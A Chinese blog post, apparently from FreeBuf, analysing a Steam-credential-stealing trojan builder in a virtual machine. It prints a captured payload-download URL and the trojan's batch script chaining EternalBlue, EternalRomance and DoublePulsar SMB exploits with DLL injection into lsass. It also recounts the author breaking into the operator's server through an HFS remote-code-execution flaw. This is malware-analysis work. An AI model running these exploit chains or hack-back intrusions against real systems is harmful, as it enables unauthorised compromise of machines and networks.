Steam盗号的背后 – 作者:joe119

前言

偶然看到一个steam盗号的视频，里面通过软件生成木马，打开之后如果输入了steam的账号密码，账号密码就会被盗取，如果那个电脑还登录了qq，甚至还可以通过登录qq邮箱来重置steam的密码（没有手机令牌，登录的qq邮箱为绑定steam的邮箱）。

在不可描述的交易之后，我拿到的样本

解压，丢到了虚拟机

分析

首先看了一下目录，里面好多fne格式结尾的文件，在文件夹的最后一行看到了客户端

这又大又闪的图标，难道是传说中的更换图标免杀么，我赶紧下载了图中的杀软，测试了一下

首先是断网测试的，打开软件试一试

哦吼，竟然还敢直接放qq出来

打开网站

这难道就是真正的黑客吗

虚拟机联网，再次打开软件

通过wireshark看一下流量

首先返回了我的登录ip，之后返回了版本信息，最后返回了通知

注册一个账户登录一下

登录之后在不断的请求服务器，判断是否获取到新的账号密码

生成一个木马

直接就在虚拟机打开

在看流量的时候发现了一个rj.txt

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Mon, 15 Jun 2020 20:10:00 GMT
Accept-Ranges: bytes
ETag: "6e3317f35043d61:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 28 Jun 2020 09:11:18 GMT
Content-Length: 120
​
http://note.youdao.com/yws/public/resource/ad9c19d74a1ee52aac35d1b1bab19b99/xmlnote/A33ECF11E57E4599B93D54D74F14C11B/335

之后的流量应该是下载了一个文件

等待文件下载完之后，看到了一串异常的流量

在遍历这个c段，感觉事情有点不妙，回头一看虚拟机已经蓝屏重启了…

把样本丢到微步

果然，在扫内网的永恒之蓝

可能因为虚拟机分配的内存比较小，所以一打就蓝屏了

接下来找到下载的文件

发现了攻击脚本

把虚拟机的内存调整为6g，之后更改脚本配置，直接打虚拟机

@echo off
mode con cols=100 lines=50&color 0c
set a=127.0.0.1
Eternalblue-2.2.0.exe  --TargetIp  %a%  --Target WIN72K8R2 --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12
Doublepulsar-1.3.1.exe  --TargetIp  %a%  --TargetPort 445 --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll  --DllPayload dll\64.dll
Eternalblue-2.2.0.exe  --TargetIp  %a%  --Target XP --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12
Doublepulsar-1.3.1.exe  --TargetIp  %a% --TargetPort 445 --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll  --DllPayload dll\86.dll
​
Eternalblue-2.2.0.exe  --TargetIp  %a%  --Target WIN72K8R2 --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12
Doublepulsar-1.3.1.exe  --TargetIp  %a%  --TargetPort 445 --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll  --DllPayload Eternalblue.dll
Eternalblue-2.2.0.exe  --TargetIp  %a%  --Target XP --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12
Doublepulsar-1.3.1.exe  --TargetIp  %a% --TargetPort 445 --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll  --DllPayload Doublepulsar.dll
​
Eternalromance-1.4.0.exe  --TargetIp  %a%  --Target WIN72K8R2  --logfile log.txt
Doublepulsar-1.3.1.exe  --TargetIp  %a% --Protocol SMB --Architecture x64 --Function RunDLL  --DllPayload dll\64.dll
Eternalromance-1.4.0.exe  --TargetIp  %a%  --Target XP  --logfile log.txt
Doublepulsar-1.3.1.exe  --TargetIp  %a% --Protocol SMB --Architecture x86 --Function RunDLL  --DllPayload dll\86.dll
​
Eternalromance-1.4.0.exe  --TargetIp  %a%  --Target WIN72K8R2  --logfile log.txt
Doublepulsar-1.3.1.exe  --TargetIp  %a% --Protocol SMB --Architecture x86 --Function RunDLL  --DllPayload Eternalblue.dll
Eternalromance-1.4.0.exe  --TargetIp  %a%  --Target XP  --logfile log.txt
Doublepulsar-1.3.1.exe  --TargetIp  %a% --Protocol SMB --Architecture x64 --Function RunDLL  --DllPayload Doublepulsar.dll
​
echo %a%>>goodlog.txt
exit
​

发现请求了另一台主机，并且下载了文件

打开网站

已经有了2400多次的下载

看一下本地建立的链接

这个8000端口对应的ip应该就是对方的c2了

下载的文件继续放到微步分析

在shodan查看一下端口信息

在他的hfs服务上存在命令执行漏洞（hfs2.3c及以前的2.3x版本存在rce）

设置好参数，攻击成功后，获得截图

现在对方已经修复漏洞

尾声

拿下对方服务器没多久，攻击行为被对方发现，并且修补了漏洞，在日常下载软件的时候一定要在正规途径下载，使用杀软（多少有些作用）保护自己电脑的安全。

来源：freebuf.com 2020-07-05 11:38:06 by: joe119